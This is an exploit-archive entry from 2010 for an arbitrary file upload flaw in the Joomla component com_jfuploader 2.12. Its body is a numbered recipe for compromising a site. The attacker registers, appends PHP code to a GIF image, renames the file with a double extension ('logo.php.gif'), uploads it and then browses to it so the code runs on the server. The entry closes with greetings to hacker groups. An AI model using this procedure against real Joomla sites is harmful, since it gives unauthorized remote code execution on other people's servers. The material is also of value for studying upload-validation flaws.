Joomla! Component com_jfuploader 2.12 - Arbitrary File Upload

2010-10-30T00:00:00
ID EXPLOITPACK:DABEC891D0E0899185E39DE2FA46A320
Type exploitpack
Reporter Setr0nix
Modified 2010-10-30T00:00:00

Description

Joomla! Component com_jfuploader 2.12 - Arbitrary File Upload

                                        
                                            =========================================================================================================
[#]    Type    : Joomla Component com_jfuploader < 2.12 Remote File Upload
[#]    Author  : Setr0nix
[#]    Home    : www.Setr0nix.com
[#]    Contact : Admin@Setr0nix.com
=========================================================================================================

[#]    Exploit :
       1. Register 
	   2. http://127.0.0.1/index.php?option=com_jfuploader&Itemid=[Itemid]
	   3. Download One gif Image ( Example : http://www.google.com/images/logo.gif )
	   4. Open logo.gif In Notepad++ And Got to Last Line
	   5. Copy And Past You PHP Code After The Last Line ( Don't Delete Any Thing Of Image Code )
	   6. Save It , Ctrl + S
	   7. Rename logo.gif To logo.php.gif And Upload It From com_jfuploader
	   8. To Run Your Uploaded File Go To This Link : http://127.0.0.1/files/YourUsername/logo.php.gif
	   
=========================================================================================================
[#]    S T T   :
       All Iranian Hackers , Offensive Security , Inj3ct0r , SecurityReason
=========================================================================================================